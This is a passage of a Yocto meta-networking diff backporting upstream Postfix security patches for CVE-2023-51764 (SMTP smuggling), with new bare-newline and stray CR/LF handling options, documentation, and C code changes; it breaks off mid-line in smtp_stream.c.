++/* Available in Postfix 3.9, 3.8.4, 3.7.9, 3.6.13, 3.5.23 and later: ++/* .IP "\fBsmtpd_forbid_bare_newline (Postfix < 3.9: no)\fR" ++/* Reply with "Error: bare <LF> received" and disconnect ++/* when a remote SMTP client sends a line ending in <LF>, violating ++/* the RFC 5321 requirement that lines must end in <CR><LF>. ++/* .IP "\fBsmtpd_forbid_bare_newline_exclusions ($mynetworks)\fR" ++/* Exclude the specified clients from smtpd_forbid_bare_newline ++/* enforcement. + /* TARPIT CONTROLS + /* .ad + /* .fi +@@ -1467,6 +1476,10 @@ + int var_smtpd_uproxy_tmout; + bool var_relay_before_rcpt_checks; + ++bool var_smtpd_forbid_bare_lf; ++char *var_smtpd_forbid_bare_lf_excl; ++static NAMADR_LIST *bare_lf_excl; ++ + /* + * Silly little macros. + */ +@@ -1541,6 +1554,7 @@ + #define REASON_TIMEOUT "timeout" + #define REASON_LOST_CONNECTION "lost connection" + #define REASON_ERROR_LIMIT "too many errors" ++#define REASON_BARE_LF "bare <LF> received" + + #ifdef USE_TLS + +@@ -3967,6 +3981,7 @@ + */ + done = 0; + do { ++ int payload_err; + + /* + * Do not skip the smtp_fread_buf() call if read_len == 0. We still +@@ -3980,6 +3995,10 @@ + smtp_fread_buf(state->buffer, read_len, state->client); + state->bdat_get_stream = vstream_memreopen( + state->bdat_get_stream, state->buffer, O_RDONLY); ++ vstream_control(state->bdat_get_stream, CA_VSTREAM_CTL_EXCEPT, ++ CA_VSTREAM_CTL_END); ++ if ((payload_err = vstream_setjmp(state->bdat_get_stream)) != 0) ++ vstream_longjmp(state->client, payload_err); + + /* + * Read lines from the fragment. The last line may continue in the +@@ -4655,6 +4674,9 @@ + */ + xclient_allowed = + namadr_list_match(xclient_hosts, state->name, state->addr); ++ smtp_forbid_bare_lf = SMTPD_STAND_ALONE((state)) == 0 ++ && var_smtpd_forbid_bare_lf ++ && !namadr_list_match(bare_lf_excl, state->name, state->addr); + /* NOT: tls_reset() */ + if (got_helo == 0) + helo_reset(state); +@@ -5446,6 +5468,13 @@ + var_myhostname); + break; + ++ case SMTP_ERR_LF: ++ state->reason = REASON_BARE_LF; ++ if (vstream_setjmp(state->client) == 0) ++ smtpd_chat_reply(state, "521 5.5.2 %s Error: bare <LF> received", ++ var_myhostname); ++ break; ++ + case 0: + + /* +@@ -5995,6 +6024,13 @@ + namadr_list_match(xforward_hosts, state.name, state.addr); + + /* ++ * Enforce strict SMTP line endings, with compatibility exclusions. ++ */ ++ smtp_forbid_bare_lf = SMTPD_STAND_ALONE((&state)) == 0 ++ && var_smtpd_forbid_bare_lf ++ && !namadr_list_match(bare_lf_excl, state.name, state.addr); ++ ++ /* + * See if we need to turn on verbose logging for this client. + */ + debug_peer_check(state.name, state.addr); +@@ -6055,6 +6091,10 @@ + hogger_list = namadr_list_init(VAR_SMTPD_HOGGERS, MATCH_FLAG_RETURN + | match_parent_style(VAR_SMTPD_HOGGERS), + var_smtpd_hoggers); ++ bare_lf_excl = namadr_list_init(VAR_SMTPD_FORBID_BARE_LF_EXCL, ++ MATCH_FLAG_RETURN ++ | match_parent_style(VAR_MYNETWORKS), ++ var_smtpd_forbid_bare_lf_excl); + + /* + * Open maps before dropping privileges so we can read passwords etc. +@@ -6412,6 +6452,7 @@ + VAR_SMTPD_PEERNAME_LOOKUP, DEF_SMTPD_PEERNAME_LOOKUP, &var_smtpd_peername_lookup, + VAR_SMTPD_DELAY_OPEN, DEF_SMTPD_DELAY_OPEN, &var_smtpd_delay_open, + VAR_SMTPD_CLIENT_PORT_LOG, DEF_SMTPD_CLIENT_PORT_LOG, &var_smtpd_client_port_log, ++ VAR_SMTPD_FORBID_BARE_LF, DEF_SMTPD_FORBID_BARE_LF, &var_smtpd_forbid_bare_lf, + 0, + }; + static const CONFIG_NBOOL_TABLE nbool_table[] = { +@@ -6527,6 +6568,7 @@ + VAR_SMTPD_POLICY_CONTEXT, DEF_SMTPD_POLICY_CONTEXT, &var_smtpd_policy_context, 0, 0, + VAR_SMTPD_DNS_RE_FILTER, DEF_SMTPD_DNS_RE_FILTER, &var_smtpd_dns_re_filter, 0, 0, + VAR_SMTPD_REJ_FTR_MAPS, DEF_SMTPD_REJ_FTR_MAPS, &var_smtpd_rej_ftr_maps, 0, 0, ++ VAR_SMTPD_FORBID_BARE_LF_EXCL, DEF_SMTPD_FORBID_BARE_LF_EXCL, &var_smtpd_forbid_bare_lf_excl, 0, 0, + 0, + }; + static const CONFIG_RAW_TABLE raw_table[] = { diff --git a/meta-networking/recipes-daemons/postfix/files/CVE-2023-51764-2.patch b/meta-networking/recipes-daemons/postfix/files/CVE-2023-51764-2.patch new file mode 100644 index 0000000000..e97a088557 --- /dev/null +++ b/meta-networking/recipes-daemons/postfix/files/CVE-2023-51764-2.patch @@ -0,0 +1,978 @@ +From cb3b1cbda3dec086a7f4541fe64751d9bb2988bd Mon Sep 17 00:00:00 2001 +From: Wietse Venema <wietse@porcupine.org> +Date: Sun, 21 Jan 2024 00:00:00 -0500 +Subject: [PATCH] postfix-3.6.14 + +--- + +Upstream-Status: Backport from [https://launchpad.net/ubuntu/+source/postfix/3.6.4-1ubuntu1.3] +CVE: CVE-2023-51764 +Signed-off-by: Ashish Sharma <asharma@mvista.com> + + man/man5/postconf.5 | 173 +++++++++++++++++++++++++++++++++++------- + man/man8/cleanup.8 | 8 + + man/man8/smtpd.8 | 11 +- + mantools/postlink | 6 - + proto/postconf.proto | 142 +++++++++++++++++++++++++++------- + src/cleanup/cleanup.c | 8 + + src/cleanup/cleanup_init.c | 2 + src/cleanup/cleanup_message.c | 17 ++++ + src/global/cleanup_strerror.c | 1 + src/global/cleanup_user.h | 6 + + src/global/mail_params.h | 9 +- + src/global/smtp_stream.c | 34 +++++--- + src/global/smtp_stream.h | 4 + src/smtpd/smtpd.c | 114 ++++++++++++++++++++------- + src/smtpd/smtpd_check.c | 14 ++- + src/smtpd/smtpd_check.h | 1 + 16 files changed, 443 insertions(+), 107 deletions(-) + +--- a/man/man5/postconf.5 ++++ b/man/man5/postconf.5 +@@ -845,6 +845,32 @@ + .fi + .ad + .ft R ++.SH cleanup_replace_stray_cr_lf (default: yes) ++Replace each stray <CR> or <LF> character in message ++content with a space character, to prevent outbound SMTP smuggling, ++and to make the evaluation of Postfix\-added DKIM or other signatures ++independent from how a remote mail server handles such characters. ++.PP ++SMTP does not allow such characters unless they are part of a ++<CR><LF> sequence, and different mail systems handle ++such stray characters in an implementation\-dependent manner. Stray ++<CR> or <LF> characters could be used for outbound ++SMTP smuggling, where an attacker uses a Postfix server to send ++message content with a non\-standard End\-of\-DATA sequence that ++triggers inbound SMTP smuggling at a remote SMTP server. ++.PP ++The replacement happens before all other content management, ++and before Postfix may add a DKIM etc. signature; if the signature ++were created first, the replacement could invalidate the signature. ++.PP ++In addition to preventing SMTP smuggling, replacing stray ++<CR> or <LF> characters ensures that the result of ++signature validation by later mail system will not depend on how ++that mail system handles those stray characters in an ++implementation\-dependent manner. ++.PP ++This feature is available in Postfix >= 3.9, 3.8.5, 3.7.10, ++3.6.14, and 3.5.24. + .SH cleanup_service_name (default: cleanup) + The name of the \fBcleanup\fR(8) service. This service rewrites addresses + into the standard form, and performs \fBcanonical\fR(5) address mapping +@@ -10413,60 +10439,153 @@ + .PP + This feature is available in Postfix 2.0 and later. + .SH smtpd_forbid_bare_newline (default: Postfix < 3.9: no) +-Reply with "Error: bare <LF> received" and disconnect +-when a remote SMTP client sends a line ending in <LF>, violating +-the RFC 5321 requirement that lines must end in <CR><LF>. +-This feature is disbled by default with Postfix < 3.9. Use +-smtpd_forbid_bare_newline_exclusions to exclude non\-standard clients +-such as netcat. Specify "smtpd_forbid_bare_newline = no" to disable +-(not recommended for an Internet\-connected MTA). +-.PP +-See +-https://www.postfix.org/smtp\-smuggling.html for details. ++Reject or restrict input lines from an SMTP client that end in ++<LF> instead of the standard <CR><LF>. Such line ++endings are commonly allowed with UNIX\-based SMTP servers, but they ++violate RFC 5321, and allowing such line endings can make a server ++vulnerable to ++SMTP smuggling. ++.PP ++Specify one of the following values (case does not matter): ++.IP "\fBnormalize\fR" ++Require the standard ++End\-of\-DATA sequence <CR><LF>.<CR><LF>. ++Otherwise, allow command or message content lines ending in the ++non\-standard <LF>, and process them as if the client sent the ++standard <CR><LF>. ++.br ++.br ++This maintains compatibility ++with many legitimate SMTP client applications that send a mix of ++standard and non\-standard line endings, but will fail to receive ++email from client implementations that do not terminate DATA content ++with the standard End\-of\-DATA sequence ++<CR><LF>.<CR><LF>. ++.br ++.br ++Such clients ++can be excluded with smtpd_forbid_bare_newline_exclusions. ++.br ++.IP "\fByes\fR" ++Compatibility alias for \fBnormalize\fR. ++.br ++.IP "\fBreject\fR" ++Require the standard End\-of\-DATA ++sequence <CR><LF>.<CR><LF>. Reject a command ++or message content when a line contains bare <LF>, log a "bare ++<LF> received" error, and reply with the SMTP status code in ++$smtpd_forbid_bare_newline_reject_code. ++.br ++.br ++This will reject ++email from SMTP clients that send any non\-standard line endings ++such as web applications, netcat, or load balancer health checks. ++.br ++.br ++This will also reject email from services that use BDAT ++to send MIME text containing a bare newline (RFC 3030 Section 3 ++requires canonical MIME format for text message types, defined in ++RFC 2045 Sections 2.7 and 2.8). ++.br ++.br ++Such clients can be ++excluded with smtpd_forbid_bare_newline_exclusions (or, in the case ++of BDAT violations, BDAT can be selectively disabled with ++smtpd_discard_ehlo_keyword_address_maps, or globally disabled with ++smtpd_discard_ehlo_keywords). ++.br ++.IP "\fBno\fR (default)" ++Do not require the standard ++End\-of\-DATA ++sequence <CR><LF>.<CR><LF>. Always process ++a bare <LF> as if the client sent <CR><LF>. This ++option is fully backwards compatible, but is not recommended for ++an Internet\-facing SMTP server, because it is vulnerable to SMTP smuggling. ++.br ++.br + .PP +-Example: ++Recommended settings: + .sp + .in +4 + .nf + .na + .ft C +-# Disconnect remote SMTP clients that send bare newlines, but allow +-# local clients with non\-standard SMTP implementations such as netcat, +-# fax machines, or load balancer health checks. ++# Require the standard End\-of\-DATA sequence <CR><LF>.<CR><LF>. ++# Otherwise, allow bare <LF> and process it as if the client sent ++# <CR><LF>. + # +-smtpd_forbid_bare_newline = yes ++# This maintains compatibility with many legitimate SMTP client ++# applications that send a mix of standard and non\-standard line ++# endings, but will fail to receive email from client implementations ++# that do not terminate DATA content with the standard End\-of\-DATA ++# sequence <CR><LF>.<CR><LF>. ++# ++# Such clients can be allowlisted with smtpd_forbid_bare_newline_exclusions. ++# The example below allowlists SMTP clients in trusted networks. ++# ++smtpd_forbid_bare_newline = normalize + smtpd_forbid_bare_newline_exclusions = $mynetworks + .fi + .ad + .ft R + .in -4 + .PP +-This feature is available in Postfix >= 3.9, 3.8.4, 3.7.9, +-3.6.13, and 3.5.23. +-.SH smtpd_forbid_bare_newline_exclusions (default: $mynetworks) +-Exclude the specified clients from smtpd_forbid_bare_newline +-enforcement. It uses the same syntax and parent\-domain matching +-behavior as mynetworks. +-.PP +-Example: ++Alternative: + .sp + .in +4 + .nf + .na + .ft C +-# Disconnect remote SMTP clients that send bare newlines, but allow +-# local clients with non\-standard SMTP implementations such as netcat, +-# fax machines, or load balancer health checks. ++# Reject input lines that contain <LF> and log a "bare <LF> received" ++# error. Require that input lines end in <CR><LF>, and require the ++# standard End\-of\-DATA sequence <CR><LF>.<CR><LF>. ++# ++# This will reject email from SMTP clients that send any non\-standard ++# line endings such as web applications, netcat, or load balancer ++# health checks. + # +-smtpd_forbid_bare_newline = yes ++# This will also reject email from services that use BDAT to send ++# MIME text containing a bare newline (RFC 3030 Section 3 requires ++# canonical MIME format for text message types, defined in RFC 2045 ++# Sections 2.7 and 2.8). ++# ++# Such clients can be allowlisted with smtpd_forbid_bare_newline_exclusions. ++# The example below allowlists SMTP clients in trusted networks. ++# ++smtpd_forbid_bare_newline = reject + smtpd_forbid_bare_newline_exclusions = $mynetworks ++# ++# Alternatively, in the case of BDAT violations, BDAT can be selectively ++# disabled with smtpd_discard_ehlo_keyword_address_maps, or globally ++# disabled with smtpd_discard_ehlo_keywords. ++# ++# smtpd_discard_ehlo_keyword_address_maps = cidr:/path/to/file ++# /path/to/file: ++# 10.0.0.0/24 chunking, silent\-discard ++# smtpd_discard_ehlo_keywords = chunking, silent\-discard + .fi + .ad + .ft R + .in -4 + .PP ++This feature with settings \fByes\fR and \fBno\fR is available ++in Postfix 3.8.4, 3.7.9, 3.6.13, and 3.5.23. Additionally, the ++settings \fBreject\fR, and \fBnormalize\fR are available with ++Postfix >= 3.9, 3.8.5, 3.7.10, 3.6.14, and 3.5.24. ++.SH smtpd_forbid_bare_newline_exclusions (default: $mynetworks) ++Exclude the specified clients from smtpd_forbid_bare_newline ++enforcement. This setting uses the same syntax and parent\-domain ++matching behavior as mynetworks. ++.PP + This feature is available in Postfix >= 3.9, 3.8.4, 3.7.9, + 3.6.13, and 3.5.23. ++.SH smtpd_forbid_bare_newline_reject_code (default: 550) ++The numerical Postfix SMTP server response code when rejecting a ++request with "smtpd_forbid_bare_newline = reject". ++Specify a 5XX status code (521 to disconnect). ++.PP ++This feature is available in Postfix >= 3.9, 3.8.5, 3.7.10, ++3.6.14, and 3.5.24. + .SH smtpd_forbidden_commands (default: CONNECT, GET, POST) + List of commands that cause the Postfix SMTP server to immediately + terminate the session with a 221 code. This can be used to disconnect +--- a/man/man8/cleanup.8 ++++ b/man/man8/cleanup.8 +@@ -163,6 +163,14 @@ + .IP "\fBmessage_strip_characters (empty)\fR" + The set of characters that Postfix will remove from message + content. ++.PP ++Available in Postfix version 3.9, 3.8.5, 3.7.10, 3.6.14, ++3.5.24, and later: ++.IP "\fBcleanup_replace_stray_cr_lf (yes)\fR" ++Replace each stray <CR> or <LF> character in message ++content with a space character, to prevent outbound SMTP smuggling, ++and to make the evaluation of Postfix\-added DKIM or other signatures ++independent from how a remote mail server handles such characters. + .SH "BEFORE QUEUE MILTER CONTROLS" + .na + .nf +--- a/man/man8/smtpd.8 ++++ b/man/man8/smtpd.8 +@@ -811,12 +811,17 @@ + .PP + Available in Postfix 3.9, 3.8.4, 3.7.9, 3.6.13, 3.5.23 and later: + .IP "\fBsmtpd_forbid_bare_newline (Postfix < 3.9: no)\fR" +-Reply with "Error: bare <LF> received" and disconnect +-when a remote SMTP client sends a line ending in <LF>, violating +-the RFC 5321 requirement that lines must end in <CR><LF>. ++Reject or restrict input lines from an SMTP client that end in ++<LF> instead of the standard <CR><LF>. + .IP "\fBsmtpd_forbid_bare_newline_exclusions ($mynetworks)\fR" + Exclude the specified clients from smtpd_forbid_bare_newline + enforcement. ++.PP ++Available in Postfix 3.9, 3.8.5, 3.7.10, 3.6.14, 3.5.24 and ++later: ++.IP "\fBsmtpd_forbid_bare_newline_reject_code (550)\fR" ++The numerical Postfix SMTP server response code when rejecting a ++request with "smtpd_forbid_bare_newline = reject". + .SH "TARPIT CONTROLS" + .na + .nf +--- a/mantools/postlink ++++ b/mantools/postlink +@@ -547,8 +547,10 @@ + s;\bsmtpd_error_sleep_time\b;<a href="postconf.5.html#smtpd_error_sleep_time">$&</a>;g; + s;\bsmtpd_etrn_restrictions\b;<a href="postconf.5.html#smtpd_etrn_restrictions">$&</a>;g; + s;\bsmtpd_expansion_filter\b;<a href="postconf.5.html#smtpd_expansion_filter">$&</a>;g; +- s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bid_bare_newline\b;<a href="postconf.5.html#smtpd_forbi d_bare_newline">$&</a>;g; +- s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bid_bare_newline_exclusions\b;<a href="postconf.5.html# smtpd_forbid_bare_newline_exclusions">$&</a>;g; ++ s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bid_bare_new[-</bB>]*\n*[ <bB>]*line\b;<a href="postconf.5.html#smtpd_forbid_bare_newline">$&</a>;g; ++ s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bid_bare_new[-</bB>]*\n*[ <bB>]*line_reject_code\b;<a href="postconf.5.html#smtpd_forbid_bare_newline_reject_code">$&</a>;g; ++ s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bid_bare_new[-</bB>]*\n*[ <bB>]*line_exclusions\b;<a href="postconf.5.html#smtpd_forbid_bare_newline_exclusions">$&</a>;g; ++ s;\bcleanup_replace_stray_cr_lf\b;<a href="postconf.5.html#cleanup_replace_stray_cr_lf">$&</a>;g; + s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bidden_commands\b;<a href="postconf.5.html#smtpd_forbidden_commands">$&</a>;g; + s;\bsmtpd_hard_error_limit\b;<a href="postconf.5.html#smtpd_hard_error_limit">$&</a>;g; + s;\bsmtpd_helo_required\b;<a href="postconf.5.html#smtpd_helo_required">$&</a>;g; +--- a/proto/postconf.proto ++++ b/proto/postconf.proto +@@ -18061,52 +18061,138 @@ + + %PARAM smtpd_forbid_bare_newline Postfix < 3.9: no + +-<p> Reply with "Error: bare <LF> received" and disconnect +-when a remote SMTP client sends a line ending in <LF>, violating +-the RFC 5321 requirement that lines must end in <CR><LF>. +-This feature is disbled by default with Postfix < 3.9. Use +-smtpd_forbid_bare_newline_exclusions to exclude non-standard clients +-such as netcat. Specify "smtpd_forbid_bare_newline = no" to disable +-(not recommended for an Internet-connected MTA). </p> ++<p> Reject or restrict input lines from an SMTP client that end in ++<LF> instead of the standard <CR><LF>. Such line ++endings are commonly allowed with UNIX-based SMTP servers, but they ++violate RFC 5321, and allowing such line endings can make a server ++vulnerable to <a href="https://www.postfix.org/smtp-smuggling.html"> ++SMTP smuggling</a>. </p> ++ ++<p> Specify one of the following values (case does not matter): </p> ++ ++<dl compact> ++ ++<dt> <b>normalize</b></dt> <dd> Require the standard ++End-of-DATA sequence <CR><LF>.<CR><LF>. ++Otherwise, allow command or message content lines ending in the ++non-standard <LF>, and process them as if the client sent the ++standard <CR><LF>. <br> <br> This maintains compatibility ++with many legitimate SMTP client applications that send a mix of ++standard and non-standard line endings, but will fail to receive ++email from client implementations that do not terminate DATA content ++with the standard End-of-DATA sequence ++<CR><LF>.<CR><LF>. <br> <br> Such clients ++can be excluded with smtpd_forbid_bare_newline_exclusions. </dd> ++ ++<dt> <b>yes</b> </dt> <dd> Compatibility alias for <b>normalize</b>. </dd> ++ ++<dt> <b>reject</b> </dt> <dd> Require the standard End-of-DATA ++sequence <CR><LF>.<CR><LF>. Reject a command ++or message content when a line contains bare <LF>, log a "bare ++<LF> received" error, and reply with the SMTP status code in ++$smtpd_forbid_bare_newline_reject_code. <br> <br> This will reject ++email from SMTP clients that send any non-standard line endings ++such as web applications, netcat, or load balancer health checks. ++<br> <br> This will also reject email from services that use BDAT ++to send MIME text containing a bare newline (RFC 3030 Section 3 ++requires canonical MIME format for text message types, defined in ++RFC 2045 Sections 2.7 and 2.8). <br> <br> Such clients can be ++excluded with smtpd_forbid_bare_newline_exclusions (or, in the case ++of BDAT violations, BDAT can be selectively disabled with ++smtpd_discard_ehlo_keyword_address_maps, or globally disabled with ++smtpd_discard_ehlo_keywords). </dd> ++ ++<dt> <b>no</b> (default)</dt> <dd> Do not require the standard ++End-of-DATA ++sequence <CR><LF>.<CR><LF>. Always process ++a bare <LF> as if the client sent <CR><LF>. This ++option is fully backwards compatible, but is not recommended for ++an Internet-facing SMTP server, because it is vulnerable to <a ++href="https://www.postfix.org/smtp-smuggling.html"> SMTP smuggling</a>. ++</dd> + +-<p> See <a href="https://www.postfix.org/smtp-smuggling.html"> +-https://www.postfix.org/smtp-smuggling.html</a> for details. ++</dl> + +-<p> Example: </p> ++<p> Recommended settings: </p> + + <blockquote> + <pre> +-# Disconnect remote SMTP clients that send bare newlines, but allow +-# local clients with non-standard SMTP implementations such as netcat, +-# fax machines, or load balancer health checks. ++# Require the standard End-of-DATA sequence <CR><LF>.<CR><LF>. ++# Otherwise, allow bare <LF> and process it as if the client sent ++# <CR><LF>. + # +-smtpd_forbid_bare_newline = yes ++# This maintains compatibility with many legitimate SMTP client ++# applications that send a mix of standard and non-standard line ++# endings, but will fail to receive email from client implementations ++# that do not terminate DATA content with the standard End-of-DATA ++# sequence <CR><LF>.<CR><LF>. ++# ++# Such clients can be allowlisted with smtpd_forbid_bare_newline_exclusions. ++# The example below allowlists SMTP clients in trusted networks. ++# ++smtpd_forbid_bare_newline = normalize + smtpd_forbid_bare_newline_exclusions = $mynetworks + </pre> + </blockquote> + +-<p> This feature is available in Postfix ≥ 3.9, 3.8.4, 3.7.9, +-3.6.13, and 3.5.23. </p> +- +-%PARAM smtpd_forbid_bare_newline_exclusions $mynetworks +- +-<p> Exclude the specified clients from smtpd_forbid_bare_newline +-enforcement. It uses the same syntax and parent-domain matching +-behavior as mynetworks. </p> +- +-<p> Example: </p> ++<p> Alternative: </p> + + <blockquote> + <pre> +-# Disconnect remote SMTP clients that send bare newlines, but allow +-# local clients with non-standard SMTP implementations such as netcat, +-# fax machines, or load balancer health checks. ++# Reject input lines that contain <LF> and log a "bare <LF> received" ++# error. Require that input lines end in <CR><LF>, and require the ++# standard End-of-DATA sequence <CR><LF>.<CR><LF>. ++# ++# This will reject email from SMTP clients that send any non-standard ++# line endings such as web applications, netcat, or load balancer ++# health checks. ++# ++# This will also reject email from services that use BDAT to send ++# MIME text containing a bare newline (RFC 3030 Section 3 requires ++# canonical MIME format for text message types, defined in RFC 2045 ++# Sections 2.7 and 2.8). ++# ++# Such clients can be allowlisted with smtpd_forbid_bare_newline_exclusions. ++# The example below allowlists SMTP clients in trusted networks. + # +-smtpd_forbid_bare_newline = yes ++smtpd_forbid_bare_newline = reject + smtpd_forbid_bare_newline_exclusions = $mynetworks ++# ++# Alternatively, in the case of BDAT violations, BDAT can be selectively ++# disabled with smtpd_discard_ehlo_keyword_address_maps, or globally ++# disabled with smtpd_discard_ehlo_keywords. ++# ++# smtpd_discard_ehlo_keyword_address_maps = cidr:/path/to/file ++# /path/to/file: ++# 10.0.0.0/24 chunking, silent-discard ++# smtpd_discard_ehlo_keywords = chunking, silent-discard + </pre> + </blockquote> + ++<p> This feature with settings <b>yes</b> and <b>no</b> is available ++in Postfix 3.8.4, 3.7.9, 3.6.13, and 3.5.23. Additionally, the ++settings <b>reject</b>, and <b>normalize</b> are available with ++Postfix ≥ 3.9, 3.8.5, 3.7.10, 3.6.14, and 3.5.24. </p> ++ ++%PARAM smtpd_forbid_bare_newline_exclusions $mynetworks ++ ++<p> Exclude the specified clients from smtpd_forbid_bare_newline ++enforcement. This setting uses the same syntax and parent-domain ++matching behavior as mynetworks. </p> ++ + <p> This feature is available in Postfix ≥ 3.9, 3.8.4, 3.7.9, + 3.6.13, and 3.5.23. </p> + ++%PARAM smtpd_forbid_bare_newline_reject_code 550 ++ ++<p> ++The numerical Postfix SMTP server response code when rejecting a ++request with "smtpd_forbid_bare_newline = reject". ++Specify a 5XX status code (521 to disconnect). ++</p> ++ ++<p> This feature is available in Postfix ≥ 3.9, 3.8.5, 3.7.10, ++3.6.14, and 3.5.24. </p> ++ ++%PARAM cleanup_replace_stray_cr_lf yes ++ +--- a/src/cleanup/cleanup.c ++++ b/src/cleanup/cleanup.c +@@ -145,6 +145,14 @@ + /* .IP "\fBmessage_strip_characters (empty)\fR" + /* The set of characters that Postfix will remove from message + /* content. ++/* .PP ++/* Available in Postfix version 3.9, 3.8.5, 3.7.10, 3.6.14, ++/* 3.5.24, and later: ++/* .IP "\fBcleanup_replace_stray_cr_lf (yes)\fR" ++/* Replace each stray <CR> or <LF> character in message ++/* content with a space character, to prevent outbound SMTP smuggling, ++/* and to make the evaluation of Postfix-added DKIM or other signatures ++/* independent from how a remote mail server handles such characters. + /* BEFORE QUEUE MILTER CONTROLS + /* .ad + /* .fi +--- a/src/cleanup/cleanup_init.c ++++ b/src/cleanup/cleanup_init.c +@@ -173,6 +173,7 @@ + int var_always_add_hdrs; /* always add missing headers */ + int var_virt_addrlen_limit; /* stop exponential growth */ + char *var_hfrom_format; /* header_from_format */ ++int var_cleanup_mask_stray_cr_lf; /* replace stray CR or LF with space */ + + const CONFIG_INT_TABLE cleanup_int_table[] = { + VAR_HOPCOUNT_LIMIT, DEF_HOPCOUNT_LIMIT, &var_hopcount_limit, 1, 0, +@@ -189,6 +190,7 @@ + VAR_VERP_BOUNCE_OFF, DEF_VERP_BOUNCE_OFF, &var_verp_bounce_off, + VAR_AUTO_8BIT_ENC_HDR, DEF_AUTO_8BIT_ENC_HDR, &var_auto_8bit_enc_hdr, + VAR_ALWAYS_ADD_HDRS, DEF_ALWAYS_ADD_HDRS, &var_always_add_hdrs, ++ VAR_CLEANUP_MASK_STRAY_CR_LF, DEF_CLEANUP_MASK_STRAY_CR_LF, &var_cleanup_mask_stray_cr_lf, + 0, + }; + +--- a/src/cleanup/cleanup_message.c ++++ b/src/cleanup/cleanup_message.c +@@ -930,6 +930,23 @@ + char *dst; + + /* ++ * Replace each stray CR or LF with one space. These are not allowed in ++ * SMTP, and can be used to enable outbound (remote) SMTP smuggling. ++ * Replacing these early ensures that our later DKIM etc. signature will ++ * not be invalidated. Besides preventing SMTP smuggling, replacing stray ++ * <CR> or <LF> ensures that the result of signature validation by a ++ * later mail system will not depend on how that mail system handles ++ * those stray characters in an implementation-dependent manner. ++ * ++ * The input length is not changed, therefore it is safe to overwrite the ++ * input. ++ */ ++ if (var_cleanup_mask_stray_cr_lf) ++ for (dst = (char *) buf; dst < buf + len; dst++) ++ if (*dst == '\r' || *dst == '\n') ++ *dst = ' '; ++ ++ /* + * Reject unwanted characters. + * + * XXX Possible optimization: simplify the loop when the "reject" set +--- a/src/global/cleanup_strerror.c ++++ b/src/global/cleanup_strerror.c +@@ -73,6 +73,7 @@ + CLEANUP_STAT_CONT, 550, "5.7.1", "message content rejected", + CLEANUP_STAT_WRITE, 451, "4.3.0", "queue file write error", + CLEANUP_STAT_NOPERM, 550, "5.7.1", "service denied", ++ CLEANUP_STAT_BARE_LF, 521, "5.5.2", "bare <LF> received", + }; + + static CLEANUP_STAT_DETAIL cleanup_stat_success = { +--- a/src/global/cleanup_user.h ++++ b/src/global/cleanup_user.h +@@ -65,6 +65,12 @@ + #define CLEANUP_STAT_NOPERM (1<<9) /* Denied by non-content policy */ + + /* ++ * Non-cleanup errors that live in the same bitmask space, to centralize ++ * error handling. ++ */ ++#define CLEANUP_STAT_BARE_LF (1<<16) /* Bare <LF> received */ ++ ++ /* + * These are set when we can't bounce even if we were asked to. + */ + #define CLEANUP_STAT_MASK_CANT_BOUNCE \ +--- a/src/global/mail_params.h ++++ b/src/global/mail_params.h +@@ -4173,11 +4173,18 @@ + * Backwards compatibility. + */ + #define VAR_SMTPD_FORBID_BARE_LF "smtpd_forbid_bare_newline" +-#define DEF_SMTPD_FORBID_BARE_LF 0 ++#define DEF_SMTPD_FORBID_BARE_LF "no" + + #define VAR_SMTPD_FORBID_BARE_LF_EXCL "smtpd_forbid_bare_newline_exclusions" + #define DEF_SMTPD_FORBID_BARE_LF_EXCL "$" VAR_MYNETWORKS + ++#define VAR_SMTPD_FORBID_BARE_LF_CODE "smtpd_forbid_bare_newline_reject_code" ++#define DEF_SMTPD_FORBID_BARE_LF_CODE 550 ++ ++#define VAR_CLEANUP_MASK_STRAY_CR_LF "cleanup_replace_stray_cr_lf" ++#define DEF_CLEANUP_MASK_STRAY_CR_LF 1 ++extern int var_cleanup_mask_stray_cr_lf; ++ + /* + * Share TLS sessions through tlsproxy(8). + */ +--- a/src/global/smtp_stream.c ++++ b/src/global/smtp_stream.c +@@ -51,7 +51,8 @@ + /* char *format; + /* va_list ap; + /* +-/* int smtp_forbid_bare_lf; ++/* int smtp_detect_bare_lf; ++/* int smtp_got_bare_lf; + /* AUXILIARY API + /* int smtp_get_noexcept(vp, stream, maxlen, flags) + /* VSTRING *vp; +@@ -126,16 +127,16 @@ + /* smtp_vprintf() is the machine underneath smtp_printf(). + /* + /* smtp_get_noexcept() implements the subset of smtp_get() +-/* without long jumps for timeout or EOF errors. Instead, ++/* without timeouts and without making long jumps. Instead, + /* query the stream status with vstream_feof() etc. +-/* This function will make a VSTREAM long jump (error code +-/* SMTP_ERR_LF) when rejecting input with a bare newline byte. ++/* ++/* This function assigns smtp_got_bare_lf = smtp_detect_bare_lf, ++/* if smtp_detect_bare_lf is non-zero and the last read line ++/* was terminated with a bare newline. Otherwise, this function ++/* sets smtp_got_bare_lf to zero. + /* + /* smtp_timeout_setup() is a backwards-compatibility interface + /* for programs that don't require per-record deadline support. +-/* +-/* smtp_forbid_bare_lf controls whether smtp_get_noexcept() +-/* will reject input with a bare newline byte. + /* DIAGNOSTICS + /* .fi + /* .ad +@@ -208,7 +209,8 @@ + + #include "smtp_stream.h" + +-int smtp_forbid_bare_lf; ++int smtp_detect_bare_lf; ++int smtp_got_bare_lf; + + /* smtp_timeout_reset - reset per-stream error flags, restart deadline timer */ + +@@ -371,6 +373,8 @@ + int last_char; + int next_char; + ++ smtp_got_bare_lf = 0; ++ + /* + * It's painful to do I/O with records that may span multiple buffers. + * Allow for partial long lines (we will read the remainder later) and +@@ -413,11 +417,15 @@ + */ + case '\n': + vstring_truncate(vp, VSTRING_LEN(vp) - 1); +- if (smtp_forbid_bare_lf +- && (VSTRING_LEN(vp) == 0 || vstring_end(vp)[-1] != '\r')) +- vstream_longjmp(stream, SMTP_ERR_LF); +- while (VSTRING_LEN(vp) > 0 && vstring_end(vp)[-1] == '\r') +- vstring_truncate(vp, VSTRING_LEN(vp) - 1); ++ if (smtp_detect_bare_lf) { ++ if (VSTRING_LEN(vp) == 0 || vstring_end(vp)[-1] != '\r') ++ smtp_got_bare_lf = smtp_detect_bare_lf; ++ else ++ vstring_truncate(vp, VSTRING_LEN(vp) - 1); ++ } else { ++ while (VSTRING_LEN(vp) > 0 && vstring_end(vp)[-1] == 